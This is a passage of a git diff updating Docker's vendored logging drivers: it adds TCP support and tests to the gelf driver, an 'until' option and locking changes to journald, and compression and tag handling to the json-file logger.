fmt.Errorf("gelf-address should be in form proto://address, got %v", address) } url, err := url.Parse(address) if err != nil { - return "", err + return nil, err } // we support only udp - if url.Scheme != "udp" { - return "", fmt.Errorf("gelf: endpoint needs to be UDP") + if url.Scheme != "udp" && url.Scheme != "tcp" { + return nil, fmt.Errorf("gelf: endpoint 
needs to be TCP or UDP") } // get host and port if _, _, err = net.SplitHostPort(url.Host); err != nil { - return "", fmt.Errorf("gelf: please provide gelf-address as udp://host:port") + return nil, fmt.Errorf("gelf: please provide gelf-address as proto://host:port") } - return url.Host, nil + return url, nil } diff --git a/vendor/github.com/docker/docker/daemon/logger/gelf/gelf_test.go b/vendor/github.com/docker/docker/daemon/logger/gelf/gelf_test.go new file mode 100644 index 0000000000..a88d56ce16 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/gelf/gelf_test.go @@ -0,0 +1,260 @@ +// +build linux + +package gelf // import "github.com/docker/docker/daemon/logger/gelf" + +import ( + "net" + "testing" + + "github.com/docker/docker/daemon/logger" +) + +// Validate parseAddress +func TestParseAddress(t *testing.T) { + url, err := parseAddress("udp://127.0.0.1:12201") + if err != nil { + t.Fatal(err) + } + if url.String() != "udp://127.0.0.1:12201" { + t.Fatalf("Expected address udp://127.0.0.1:12201, got %s", url.String()) + } + + _, err = parseAddress("127.0.0.1:12201") + if err == nil { + t.Fatal("Expected error requiring protocol") + } + + _, err = parseAddress("http://127.0.0.1:12201") + if err == nil { + t.Fatal("Expected error restricting protocol") + } +} + +// Validate TCP options +func TestTCPValidateLogOpt(t *testing.T) { + err := ValidateLogOpt(map[string]string{ + "gelf-address": "tcp://127.0.0.1:12201", + }) + if err != nil { + t.Fatal("Expected TCP to be supported") + } + + err = ValidateLogOpt(map[string]string{ + "gelf-address": "tcp://127.0.0.1:12201", + "gelf-compression-level": "9", + }) + if err == nil { + t.Fatal("Expected TCP to reject compression level") + } + + err = ValidateLogOpt(map[string]string{ + "gelf-address": "tcp://127.0.0.1:12201", + "gelf-compression-type": "gzip", + }) + if err == nil { + t.Fatal("Expected TCP to reject compression type") + } + + err = ValidateLogOpt(map[string]string{ + "gelf-address": 
"tcp://127.0.0.1:12201", + "gelf-tcp-max-reconnect": "5", + "gelf-tcp-reconnect-delay": "10", + }) + if err != nil { + t.Fatal("Expected TCP reconnect to be a valid parameters") + } + + err = ValidateLogOpt(map[string]string{ + "gelf-address": "tcp://127.0.0.1:12201", + "gelf-tcp-max-reconnect": "-1", + "gelf-tcp-reconnect-delay": "-3", + }) + if err == nil { + t.Fatal("Expected negative TCP reconnect to be rejected") + } + + err = ValidateLogOpt(map[string]string{ + "gelf-address": "tcp://127.0.0.1:12201", + "gelf-tcp-max-reconnect": "invalid", + "gelf-tcp-reconnect-delay": "invalid", + }) + if err == nil { + t.Fatal("Expected TCP reconnect to be required to be an int") + } + + err = ValidateLogOpt(map[string]string{ + "gelf-address": "udp://127.0.0.1:12201", + "gelf-tcp-max-reconnect": "1", + "gelf-tcp-reconnect-delay": "3", + }) + if err == nil { + t.Fatal("Expected TCP reconnect to be invalid for UDP") + } +} + +// Validate UDP options +func TestUDPValidateLogOpt(t *testing.T) { + err := ValidateLogOpt(map[string]string{ + "gelf-address": "udp://127.0.0.1:12201", + "tag": "testtag", + "labels": "testlabel", + "env": "testenv", + "env-regex": "testenv-regex", + "gelf-compression-level": "9", + "gelf-compression-type": "gzip", + }) + if err != nil { + t.Fatal(err) + } + + err = ValidateLogOpt(map[string]string{ + "gelf-address": "udp://127.0.0.1:12201", + "gelf-compression-level": "ultra", + "gelf-compression-type": "zlib", + }) + if err == nil { + t.Fatal("Expected compression level error") + } + + err = ValidateLogOpt(map[string]string{ + "gelf-address": "udp://127.0.0.1:12201", + "gelf-compression-type": "rar", + }) + if err == nil { + t.Fatal("Expected compression type error") + } + + err = ValidateLogOpt(map[string]string{ + "invalid": "invalid", + }) + if err == nil { + t.Fatal("Expected unknown option error") + } + + err = ValidateLogOpt(map[string]string{}) + if err == nil { + t.Fatal("Expected required parameter error") + } +} + +// Validate 
newGELFTCPWriter +func TestNewGELFTCPWriter(t *testing.T) { + address := "127.0.0.1:0" + tcpAddr, err := net.ResolveTCPAddr("tcp", address) + if err != nil { + t.Fatal(err) + } + + listener, err := net.ListenTCP("tcp", tcpAddr) + if err != nil { + t.Fatal(err) + } + + url := "tcp://" + listener.Addr().String() + info := logger.Info{ + Config: map[string]string{ + "gelf-address": url, + "gelf-tcp-max-reconnect": "0", + "gelf-tcp-reconnect-delay": "0", + "tag": "{{.ID}}", + }, + ContainerID: "12345678901234567890", + } + + writer, err := newGELFTCPWriter(listener.Addr().String(), info) + if err != nil { + t.Fatal(err) + } + + err = writer.Close() + if err != nil { + t.Fatal(err) + } + + err = listener.Close() + if err != nil { + t.Fatal(err) + } +} + +// Validate newGELFUDPWriter +func TestNewGELFUDPWriter(t *testing.T) { + address := "127.0.0.1:0" + info := logger.Info{ + Config: map[string]string{ + "gelf-address": "udp://127.0.0.1:0", + "gelf-compression-level": "5", + "gelf-compression-type": "gzip", + }, + } + + writer, err := newGELFUDPWriter(address, info) + if err != nil { + t.Fatal(err) + } + writer.Close() + if err != nil { + t.Fatal(err) + } +} + +// Validate New for TCP +func TestNewTCP(t *testing.T) { + address := "127.0.0.1:0" + tcpAddr, err := net.ResolveTCPAddr("tcp", address) + if err != nil { + t.Fatal(err) + } + + listener, err := net.ListenTCP("tcp", tcpAddr) + if err != nil { + t.Fatal(err) + } + + url := "tcp://" + listener.Addr().String() + info := logger.Info{ + Config: map[string]string{ + "gelf-address": url, + "gelf-tcp-max-reconnect": "0", + "gelf-tcp-reconnect-delay": "0", + }, + ContainerID: "12345678901234567890", + } + + logger, err := New(info) + if err != nil { + t.Fatal(err) + } + + err = logger.Close() + if err != nil { + t.Fatal(err) + } + + err = listener.Close() + if err != nil { + t.Fatal(err) + } +} + +// Validate New for UDP +func TestNewUDP(t *testing.T) { + info := logger.Info{ + Config: map[string]string{ + "gelf-address": 
"udp://127.0.0.1:0", + "gelf-compression-level": "5", + "gelf-compression-type": "gzip", + }, + ContainerID: "12345678901234567890", + } + + logger, err := New(info) + if err != nil { + t.Fatal(err) + } + + err = logger.Close() + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/daemon/logger/gelf/gelf_unsupported.go b/vendor/github.com/docker/docker/daemon/logger/gelf/gelf_unsupported.go deleted file mode 100644 index 266f73b18b..0000000000 --- a/vendor/github.com/docker/docker/daemon/logger/gelf/gelf_unsupported.go +++ /dev/null @@ -1,3 +0,0 @@ -// +build !linux - -package gelf diff --git a/vendor/github.com/docker/docker/daemon/logger/journald/journald.go b/vendor/github.com/docker/docker/daemon/logger/journald/journald.go index 9569859121..342e18f57f 100644 --- a/vendor/github.com/docker/docker/daemon/logger/journald/journald.go +++ b/vendor/github.com/docker/docker/daemon/logger/journald/journald.go @@ -2,28 +2,29 @@ // Package journald provides the log driver for forwarding server logs // to endpoints that receive the systemd format. -package journald +package journald // import "github.com/docker/docker/daemon/logger/journald" import ( "fmt" "sync" "unicode" - "github.com/Sirupsen/logrus" "github.com/coreos/go-systemd/journal" "github.com/docker/docker/daemon/logger" "github.com/docker/docker/daemon/logger/loggerutils" + "github.com/sirupsen/logrus" ) const name = "journald" type journald struct { + mu sync.Mutex vars map[string]string // additional variables and values to send to the journal along with the log message readers readerList + closed bool } type readerList struct { - mu sync.Mutex readers map[*logger.LogWatcher]*logger.LogWatcher } @@ -58,30 +59,28 @@ func sanitizeKeyMod(s string) string { // New creates a journald logger using the configuration passed in on // the context. 
-func New(ctx logger.Context) (logger.Logger, error) { +func New(info logger.Info) (logger.Logger, error) { if !journal.Enabled() { return nil, fmt.Errorf("journald is not enabled on this host") } - // Strip a leading slash so that people can search for - // CONTAINER_NAME=foo rather than CONTAINER_NAME=/foo. - name := ctx.ContainerName - if name[0] == '/' { - name = name[1:] - } // parse log tag - tag, err := loggerutils.ParseLogTag(ctx, loggerutils.DefaultTemplate) + tag, err := loggerutils.ParseLogTag(info, loggerutils.DefaultTemplate) if err != nil { return nil, err } vars := map[string]string{ - "CONTAINER_ID": ctx.ContainerID[:12], - "CONTAINER_ID_FULL": ctx.ContainerID, - "CONTAINER_NAME": name, + "CONTAINER_ID": info.ContainerID[:12], + "CONTAINER_ID_FULL": info.ContainerID, + "CONTAINER_NAME": info.Name(), "CONTAINER_TAG": tag, + "SYSLOG_IDENTIFIER": tag, + } + extraAttrs, err := info.ExtraAttributes(sanitizeKeyMod) + if err != nil { + return nil, err } - extraAttrs := ctx.ExtraAttributes(sanitizeKeyMod) for k, v := range extraAttrs { vars[k] = v } @@ -95,6 +94,7 @@ func validateLogOpt(cfg map[string]string) error { switch key { case "labels": case "env": + case "env-regex": case "tag": default: return fmt.Errorf("unknown log opt '%s' for journald log driver", key) @@ -108,13 +108,18 @@ func (s *journald) Log(msg *logger.Message) error { for k, v := range s.vars { vars[k] = v } - if msg.Partial { + if msg.PLogMetaData != nil { vars["CONTAINER_PARTIAL_MESSAGE"] = "true" } - if msg.Source == "stderr" { - return journal.Send(string(msg.Line), journal.PriErr, vars) + + line := string(msg.Line) + source := msg.Source + logger.PutMessage(msg) + + if source == "stderr" { + return journal.Send(line, journal.PriErr, vars) } - return journal.Send(string(msg.Line), journal.PriInfo, vars) + return journal.Send(line, journal.PriInfo, vars) } func (s *journald) Name() string { diff --git a/vendor/github.com/docker/docker/daemon/logger/journald/journald_test.go 
b/vendor/github.com/docker/docker/daemon/logger/journald/journald_test.go index 224423fd07..bd7bf7a3b3 100644 --- a/vendor/github.com/docker/docker/daemon/logger/journald/journald_test.go +++ b/vendor/github.com/docker/docker/daemon/logger/journald/journald_test.go @@ -1,6 +1,6 @@ // +build linux -package journald +package journald // import "github.com/docker/docker/daemon/logger/journald" import ( "testing" diff --git a/vendor/github.com/docker/docker/daemon/logger/journald/journald_unsupported.go b/vendor/github.com/docker/docker/daemon/logger/journald/journald_unsupported.go index d52ca92e4f..7899fc1214 100644 --- a/vendor/github.com/docker/docker/daemon/logger/journald/journald_unsupported.go +++ b/vendor/github.com/docker/docker/daemon/logger/journald/journald_unsupported.go @@ -1,6 +1,6 @@ // +build !linux -package journald +package journald // import "github.com/docker/docker/daemon/logger/journald" type journald struct { } diff --git a/vendor/github.com/docker/docker/daemon/logger/journald/read.go b/vendor/github.com/docker/docker/daemon/logger/journald/read.go index d91eb809bc..d4bcc62d9a 100644 --- a/vendor/github.com/docker/docker/daemon/logger/journald/read.go +++ b/vendor/github.com/docker/docker/daemon/logger/journald/read.go @@ -1,6 +1,6 @@ // +build linux,cgo,!static_build,journald -package journald +package journald // import "github.com/docker/docker/daemon/logger/journald" // #include // #include @@ -155,27 +155,31 @@ import ( "time" "unsafe" - "github.com/Sirupsen/logrus" "github.com/coreos/go-systemd/journal" + "github.com/docker/docker/api/types/backend" "github.com/docker/docker/daemon/logger" + "github.com/sirupsen/logrus" ) func (s *journald) Close() error { - s.readers.mu.Lock() + s.mu.Lock() + s.closed = true for reader := range s.readers.readers { reader.Close() } - s.readers.mu.Unlock() + s.mu.Unlock() return nil } -func (s *journald) drainJournal(logWatcher *logger.LogWatcher, config logger.ReadConfig, j *C.sd_journal, oldCursor 
*C.char) *C.char { +func (s *journald) drainJournal(logWatcher *logger.LogWatcher, j *C.sd_journal, oldCursor *C.char, untilUnixMicro uint64) (*C.char, bool) { var msg, data, cursor *C.char var length C.size_t var stamp C.uint64_t var priority, partial C.int + var done bool - // Walk the journal from here forward until we run out of new entries. + // Walk the journal from here forward until we run out of new entries + // or we reach the until value (if provided). drain: for { // Try not to send a given entry twice. @@ -193,6 +197,12 @@ drain: if C.sd_journal_get_realtime_usec(j, &stamp) != 0 { break } + // Break if the timestamp exceeds any provided until flag. + if untilUnixMicro != 0 && untilUnixMicro < uint64(stamp) { + done = true + break + } + // Set up the time and text of the entry. timestamp := time.Unix(int64(stamp)/1000000, (int64(stamp)%1000000)*1000) line := C.GoBytes(unsafe.Pointer(msg), C.int(length)) @@ -212,14 +222,11 @@ drain: source = "stdout" } // Retrieve the values of any variables we're adding to the journal. - attrs := make(map[string]string) + var attrs []backend.LogAttr C.sd_journal_restart_data(j) for C.get_attribute_field(j, &data, &length) > C.int(0) { kv := strings.SplitN(C.GoStringN(data, C.int(length)), "=", 2) - attrs[kv[0]] = kv[1] - } - if len(attrs) == 0 { - attrs = nil + attrs = append(attrs, backend.LogAttr{Key: kv[0], Value: kv[1]}) } // Send the log message. 
logWatcher.Msg <- &logger.Message{ @@ -237,41 +244,65 @@ drain: // free(NULL) is safe C.free(unsafe.Pointer(oldCursor)) - C.sd_journal_get_cursor(j, &cursor) - return cursor + if C.sd_journal_get_cursor(j, &cursor) != 0 { + // ensure that we won't be freeing an address that's invalid + cursor = nil + } + return cursor, done } -func (s *journald) followJournal(logWatcher *logger.LogWatcher, config logger.ReadConfig, j *C.sd_journal, pfd [2]C.int, cursor *C.char) *C.char { - s.readers.mu.Lock() +func (s *journald) followJournal(logWatcher *logger.LogWatcher, j *C.sd_journal, pfd [2]C.int, cursor *C.char, untilUnixMicro uint64) *C.char { + s.mu.Lock() s.readers.readers[logWatcher] = logWatcher - s.readers.mu.Unlock() + if s.closed { + // the journald Logger is closed, presumably because the container has been + // reset. So we shouldn't follow, because we'll never be woken up. But we + // should make one more drainJournal call to be sure we've got all the logs. + // Close pfd[1] so that one drainJournal happens, then cleanup, then return. + C.close(pfd[1]) + } + s.mu.Unlock() + + newCursor := make(chan *C.char) + go func() { - // Keep copying journal data out until we're notified to stop - // or we hit an error. - status := C.wait_for_data_cancelable(j, pfd[0]) - for status == 1 { - cursor = s.drainJournal(logWatcher, config, j, cursor) - status = C.wait_for_data_cancelable(j, pfd[0]) - } - if status < 0 { - cerrstr := C.strerror(C.int(-status)) - errstr := C.GoString(cerrstr) - fmtstr := "error %q while attempting to follow journal for container %q" - logrus.Errorf(fmtstr, errstr, s.vars["CONTAINER_ID_FULL"]) + for { + // Keep copying journal data out until we're notified to stop + // or we hit an error. 
+ status := C.wait_for_data_cancelable(j, pfd[0]) + if status < 0 { + cerrstr := C.strerror(C.int(-status)) + errstr := C.GoString(cerrstr) + fmtstr := "error %q while attempting to follow journal for container %q" + logrus.Errorf(fmtstr, errstr, s.vars["CONTAINER_ID_FULL"]) + break + } + + var done bool + cursor, done = s.drainJournal(logWatcher, j, cursor, untilUnixMicro) + + if status != 1 || done { + // We were notified to stop + break + } } + // Clean up. C.close(pfd[0]) - s.readers.mu.Lock() + s.mu.Lock() delete(s.readers.readers, logWatcher) - s.readers.mu.Unlock() - C.sd_journal_close(j) + s.mu.Unlock() close(logWatcher.Msg) + newCursor <- cursor }() + // Wait until we're told to stop. select { + case cursor = <-newCursor: case <-logWatcher.WatchClose(): // Notify the other goroutine that its work is done. C.close(pfd[1]) + cursor = <-newCursor } return cursor @@ -282,6 +313,7 @@ func (s *journald) readLogs(logWatcher *logger.LogWatcher, config logger.ReadCon var cmatch, cursor *C.char var stamp C.uint64_t var sinceUnixMicro uint64 + var untilUnixMicro uint64 var pipes [2]C.int // Get a handle to the journal. @@ -298,9 +330,9 @@ func (s *journald) readLogs(logWatcher *logger.LogWatcher, config logger.ReadCon following := false defer func(pfollowing *bool) { if !*pfollowing { - C.sd_journal_close(j) close(logWatcher.Msg) } + C.sd_journal_close(j) }(&following) // Remove limits on the size of data items that we'll retrieve. rc = C.sd_journal_set_data_threshold(j, C.size_t(0)) @@ -321,10 +353,19 @@ func (s *journald) readLogs(logWatcher *logger.LogWatcher, config logger.ReadCon nano := config.Since.UnixNano() sinceUnixMicro = uint64(nano / 1000) } + // If we have an until value, convert it too + if !config.Until.IsZero() { + nano := config.Until.UnixNano() + untilUnixMicro = uint64(nano / 1000) + } if config.Tail > 0 { lines := config.Tail - // Start at the end of the journal. - if C.sd_journal_seek_tail(j) < 0 { + // If until time provided, start from there. 
+ // Otherwise start at the end of the journal. + if untilUnixMicro != 0 && C.sd_journal_seek_realtime_usec(j, C.uint64_t(untilUnixMicro)) < 0 { + logWatcher.Err <- fmt.Errorf("error seeking provided until value") + return + } else if C.sd_journal_seek_tail(j) < 0 { logWatcher.Err <- fmt.Errorf("error seeking to end of journal") return } @@ -340,8 +381,7 @@ func (s *journald) readLogs(logWatcher *logger.LogWatcher, config logger.ReadCon if C.sd_journal_get_realtime_usec(j, &stamp) != 0 { break } else { - // Compare the timestamp on the entry - // to our threshold value. + // Compare the timestamp on the entry to our threshold value. if sinceUnixMicro != 0 && sinceUnixMicro > uint64(stamp) { break } @@ -370,7 +410,7 @@ func (s *journald) readLogs(logWatcher *logger.LogWatcher, config logger.ReadCon return } } - cursor = s.drainJournal(logWatcher, config, j, nil) + cursor, _ = s.drainJournal(logWatcher, j, nil, untilUnixMicro) if config.Follow { // Allocate a descriptor for following the journal, if we'll // need one. Do it here so that we can report if it fails. @@ -382,7 +422,7 @@ func (s *journald) readLogs(logWatcher *logger.LogWatcher, config logger.ReadCon if C.pipe(&pipes[0]) == C.int(-1) { logWatcher.Err <- fmt.Errorf("error opening journald close notification pipe") } else { - cursor = s.followJournal(logWatcher, config, j, pipes, cursor) + cursor = s.followJournal(logWatcher, j, pipes, cursor, untilUnixMicro) // Let followJournal handle freeing the journal context // object and closing the channel. 
following = true diff --git a/vendor/github.com/docker/docker/daemon/logger/journald/read_native.go b/vendor/github.com/docker/docker/daemon/logger/journald/read_native.go index bba6de55be..ab68cf4ba7 100644 --- a/vendor/github.com/docker/docker/daemon/logger/journald/read_native.go +++ b/vendor/github.com/docker/docker/daemon/logger/journald/read_native.go @@ -1,6 +1,6 @@ // +build linux,cgo,!static_build,journald,!journald_compat -package journald +package journald // import "github.com/docker/docker/daemon/logger/journald" // #cgo pkg-config: libsystemd import "C" diff --git a/vendor/github.com/docker/docker/daemon/logger/journald/read_native_compat.go b/vendor/github.com/docker/docker/daemon/logger/journald/read_native_compat.go index 3f7a43c59e..4806e130ef 100644 --- a/vendor/github.com/docker/docker/daemon/logger/journald/read_native_compat.go +++ b/vendor/github.com/docker/docker/daemon/logger/journald/read_native_compat.go @@ -1,6 +1,6 @@ // +build linux,cgo,!static_build,journald,journald_compat -package journald +package journald // import "github.com/docker/docker/daemon/logger/journald" // #cgo pkg-config: libsystemd-journal import "C" diff --git a/vendor/github.com/docker/docker/daemon/logger/journald/read_unsupported.go b/vendor/github.com/docker/docker/daemon/logger/journald/read_unsupported.go index b43abdcaf7..a66b666659 100644 --- a/vendor/github.com/docker/docker/daemon/logger/journald/read_unsupported.go +++ b/vendor/github.com/docker/docker/daemon/logger/journald/read_unsupported.go @@ -1,6 +1,6 @@ // +build !linux !cgo static_build !journald -package journald +package journald // import "github.com/docker/docker/daemon/logger/journald" func (s *journald) Close() error { return nil diff --git a/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonfilelog.go b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonfilelog.go index a429a08a4f..b806a5ad17 100644 --- 
a/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonfilelog.go +++ b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonfilelog.go @@ -1,7 +1,7 @@ // Package jsonfilelog provides the default Logger implementation for // Docker logging. This logger logs to files on the host server in the // JSON format. -package jsonfilelog +package jsonfilelog // import "github.com/docker/docker/daemon/logger/jsonfilelog" import ( "bytes" @@ -10,11 +10,12 @@ import ( "strconv" "sync" - "github.com/Sirupsen/logrus" "github.com/docker/docker/daemon/logger" + "github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog" "github.com/docker/docker/daemon/logger/loggerutils" - "github.com/docker/docker/pkg/jsonlog" "github.com/docker/go-units" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) // Name is the name of the file that the jsonlogger logs to. @@ -22,11 +23,11 @@ const Name = "json-file" // JSONFileLogger is Logger implementation for default Docker logging. type JSONFileLogger struct { - buf *bytes.Buffer - writer *loggerutils.RotateFileWriter mu sync.Mutex + closed bool + writer *loggerutils.LogFile readers map[*logger.LogWatcher]struct{} // stores the active log followers - extra []byte // json-encoded extra attributes + tag string // tag values requested by the user to log } func init() { @@ -40,17 +41,20 @@ func init() { // New creates new JSONFileLogger which writes to filename passed in // on given context. 
-func New(ctx logger.Context) (logger.Logger, error) { +func New(info logger.Info) (logger.Logger, error) { var capval int64 = -1 - if capacity, ok := ctx.Config["max-size"]; ok { + if capacity, ok := info.Config["max-size"]; ok { var err error capval, err = units.FromHumanSize(capacity) if err != nil { return nil, err } + if capval <= 0 { + return nil, fmt.Errorf("max-size should be a positive numbler") + } } var maxFiles = 1 - if maxFileString, ok := ctx.Config["max-file"]; ok { + if maxFileString, ok := info.Config["max-file"]; ok { var err error maxFiles, err = strconv.Atoi(maxFileString) if err != nil { @@ -61,13 +65,34 @@ func New(ctx logger.Context) (logger.Logger, error) { } } - writer, err := loggerutils.NewRotateFileWriter(ctx.LogPath, capval, maxFiles) + var compress bool + if compressString, ok := info.Config["compress"]; ok { + var err error + compress, err = strconv.ParseBool(compressString) + if err != nil { + return nil, err + } + if compress && (maxFiles == 1 || capval == -1) { + return nil, fmt.Errorf("compress cannot be true when max-file is less than 2 or max-size is not set") + } + } + + attrs, err := info.ExtraAttributes(nil) if err != nil { return nil, err } + // no default template. 
only use a tag if the user asked for it + tag, err := loggerutils.ParseLogTag(info, "") + if err != nil { + return nil, err + } + if tag != "" { + attrs["tag"] = tag + } + var extra []byte - if attrs := ctx.ExtraAttributes(nil); len(attrs) > 0 { + if len(attrs) > 0 { var err error extra, err = json.Marshal(attrs) if err != nil { @@ -75,42 +100,52 @@ func New(ctx logger.Context) (logger.Logger, error) { } } + buf := bytes.NewBuffer(nil) + marshalFunc := func(msg *logger.Message) ([]byte, error) { + if err := marshalMessage(msg, extra, buf); err != nil { + return nil, err + } + b := buf.Bytes() + buf.Reset() + return b, nil + } + + writer, err := loggerutils.NewLogFile(info.LogPath, capval, maxFiles, compress, marshalFunc, decodeFunc, 0640) + if err != nil { + return nil, err + } + return &JSONFileLogger{ - buf: bytes.NewBuffer(nil), writer: writer, readers: make(map[*logger.LogWatcher]struct{}), - extra: extra, + tag: tag, }, nil } // Log converts logger.Message to jsonlog.JSONLog and serializes it to file. 
func (l *JSONFileLogger) Log(msg *logger.Message) error { - timestamp, err := jsonlog.FastTimeMarshalJSON(msg.Timestamp) - if err != nil { - return err - } l.mu.Lock() - logline := msg.Line - if !msg.Partial { - logline = append(msg.Line, '\n') + err := l.writer.WriteLogEntry(msg) + l.mu.Unlock() + return err +} + +func marshalMessage(msg *logger.Message, extra json.RawMessage, buf *bytes.Buffer) error { + logLine := msg.Line + if msg.PLogMetaData == nil || (msg.PLogMetaData != nil && msg.PLogMetaData.Last) { + logLine = append(msg.Line, '\n') } - err = (&jsonlog.JSONLogs{ - Log: logline, + err := (&jsonlog.JSONLogs{ + Log: logLine, Stream: msg.Source, - Created: timestamp, - RawAttrs: l.extra, - }).MarshalJSONBuf(l.buf) + Created: msg.Timestamp, + RawAttrs: extra, + }).MarshalJSONBuf(buf) if err != nil { - l.mu.Unlock() - return err + return errors.Wrap(err, "error writing log message to buffer") } - - l.buf.WriteByte('\n') - _, err = l.writer.Write(l.buf.Bytes()) - l.buf.Reset() - l.mu.Unlock() - - return err + err = buf.WriteByte('\n') + return errors.Wrap(err, "error finalizing log buffer") } // ValidateLogOpt looks for json specific log options max-file & max-size. @@ -119,8 +154,11 @@ func ValidateLogOpt(cfg map[string]string) error { switch key { case "max-file": case "max-size": + case "compress": case "labels": case "env": + case "env-regex": + case "tag": default: return fmt.Errorf("unknown log opt '%s' for json-file log driver", key) } @@ -128,14 +166,10 @@ func ValidateLogOpt(cfg map[string]string) error { return nil } -// LogPath returns the location the given json logger logs to. -func (l *JSONFileLogger) LogPath() string { - return l.writer.LogPath() -} - // Close closes underlying file and signals all readers to stop. 
func (l *JSONFileLogger) Close() error { l.mu.Lock() + l.closed = true err := l.writer.Close() for r := range l.readers { r.Close() diff --git a/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonfilelog_test.go b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonfilelog_test.go index b5b818a8ba..22bbcf2eb7 100644 --- a/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonfilelog_test.go +++ b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonfilelog_test.go @@ -1,6 +1,8 @@ -package jsonfilelog +package jsonfilelog // import "github.com/docker/docker/daemon/logger/jsonfilelog" import ( + "bytes" + "compress/gzip" "encoding/json" "io/ioutil" "os" @@ -11,7 +13,10 @@ import ( "time" "github.com/docker/docker/daemon/logger" - "github.com/docker/docker/pkg/jsonlog" + "github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/fs" ) func TestJSONFileLogger(t *testing.T) { @@ -22,7 +27,7 @@ func TestJSONFileLogger(t *testing.T) { } defer os.RemoveAll(tmp) filename := filepath.Join(tmp, "container.log") - l, err := New(logger.Context{ + l, err := New(logger.Info{ ContainerID: cid, LogPath: filename, }) @@ -54,36 +59,78 @@ func TestJSONFileLogger(t *testing.T) { } } -func BenchmarkJSONFileLogger(b *testing.B) { +func TestJSONFileLoggerWithTags(t *testing.T) { cid := "a7317399f3f857173c6179d44823594f8294678dea9999662e5c625b5a1c7657" + cname := "test-container" tmp, err := ioutil.TempDir("", "docker-logger-") - if err != nil { - b.Fatal(err) - } + + assert.NilError(t, err) + defer os.RemoveAll(tmp) filename := filepath.Join(tmp, "container.log") - l, err := New(logger.Context{ - ContainerID: cid, - LogPath: filename, + l, err := New(logger.Info{ + Config: map[string]string{ + "tag": "{{.ID}}/{{.Name}}", // first 12 characters of ContainerID and full ContainerName + }, + ContainerID: cid, + ContainerName: cname, + LogPath: filename, }) - if err != nil { - 
b.Fatal(err) - } + + assert.NilError(t, err) defer l.Close() - testLine := "Line that thinks that it is log line from docker\n" - msg := &logger.Message{Line: []byte(testLine), Source: "stderr", Timestamp: time.Now().UTC()} - jsonlog, err := (&jsonlog.JSONLog{Log: string(msg.Line) + "\n", Stream: msg.Source, Created: msg.Timestamp}).MarshalJSON() - if err != nil { - b.Fatal(err) + err = l.Log(&logger.Message{Line: []byte("line1"), Source: "src1"}) + assert.NilError(t, err) + + err = l.Log(&logger.Message{Line: []byte("line2"), Source: "src2"}) + assert.NilError(t, err) + + err = l.Log(&logger.Message{Line: []byte("line3"), Source: "src3"}) + assert.NilError(t, err) + + res, err := ioutil.ReadFile(filename) + assert.NilError(t, err) + + expected := `{"log":"line1\n","stream":"src1","attrs":{"tag":"a7317399f3f8/test-container"},"time":"0001-01-01T00:00:00Z"} +{"log":"line2\n","stream":"src2","attrs":{"tag":"a7317399f3f8/test-container"},"time":"0001-01-01T00:00:00Z"} +{"log":"line3\n","stream":"src3","attrs":{"tag":"a7317399f3f8/test-container"},"time":"0001-01-01T00:00:00Z"} +` + assert.Check(t, is.Equal(expected, string(res))) +} + +func BenchmarkJSONFileLoggerLog(b *testing.B) { + tmp := fs.NewDir(b, "bench-jsonfilelog") + defer tmp.Remove() + + jsonlogger, err := New(logger.Info{ + ContainerID: "a7317399f3f857173c6179d44823594f8294678dea9999662e5c625b5a1c7657", + LogPath: tmp.Join("container.log"), + Config: map[string]string{ + "labels": "first,second", + }, + ContainerLabels: map[string]string{ + "first": "label_value", + "second": "label_foo", + }, + }) + assert.NilError(b, err) + defer jsonlogger.Close() + + msg := &logger.Message{ + Line: []byte("Line that thinks that it is log line from docker\n"), + Source: "stderr", + Timestamp: time.Now().UTC(), } - b.SetBytes(int64(len(jsonlog)+1) * 30) + + buf := bytes.NewBuffer(nil) + assert.NilError(b, marshalMessage(msg, nil, buf)) + b.SetBytes(int64(buf.Len())) + b.ResetTimer() for i := 0; i < b.N; i++ { - for j := 
0; j < 30; j++ { - if err := l.Log(msg); err != nil { - b.Fatal(err) - } + if err := jsonlogger.Log(msg); err != nil { + b.Fatal(err) } } } @@ -96,8 +143,8 @@ func TestJSONFileLoggerWithOpts(t *testing.T) { } defer os.RemoveAll(tmp) filename := filepath.Join(tmp, "container.log") - config := map[string]string{"max-file": "2", "max-size": "1k"} - l, err := New(logger.Context{ + config := map[string]string{"max-file": "3", "max-size": "1k", "compress": "true"} + l, err := New(logger.Info{ ContainerID: cid, LogPath: filename, Config: config, @@ -106,21 +153,55 @@ func TestJSONFileLoggerWithOpts(t *testing.T) { t.Fatal(err) } defer l.Close() - for i := 0; i < 20; i++ { + for i := 0; i < 36; i++ { if err := l.Log(&logger.Message{Line: []byte("line" + strconv.Itoa(i)), Source: "src1"}); err != nil { t.Fatal(err) } } + res, err := ioutil.ReadFile(filename) if err != nil { t.Fatal(err) } + penUlt, err := ioutil.ReadFile(filename + ".1") + if err != nil { + if !os.IsNotExist(err) { + t.Fatal(err) + } + + file, err := os.Open(filename + ".1.gz") + defer file.Close() + if err != nil { + t.Fatal(err) + } + zipReader, err := gzip.NewReader(file) + defer zipReader.Close() + if err != nil { + t.Fatal(err) + } + penUlt, err = ioutil.ReadAll(zipReader) + if err != nil { + t.Fatal(err) + } + } + + file, err := os.Open(filename + ".2.gz") + defer file.Close() + if err != nil { + t.Fatal(err) + } + zipReader, err := gzip.NewReader(file) + defer zipReader.Close() + if err != nil { + t.Fatal(err) + } + antepenult, err := ioutil.ReadAll(zipReader) if err != nil { t.Fatal(err) } - expectedPenultimate := `{"log":"line0\n","stream":"src1","time":"0001-01-01T00:00:00Z"} + expectedAntepenultimate := `{"log":"line0\n","stream":"src1","time":"0001-01-01T00:00:00Z"} {"log":"line1\n","stream":"src1","time":"0001-01-01T00:00:00Z"} 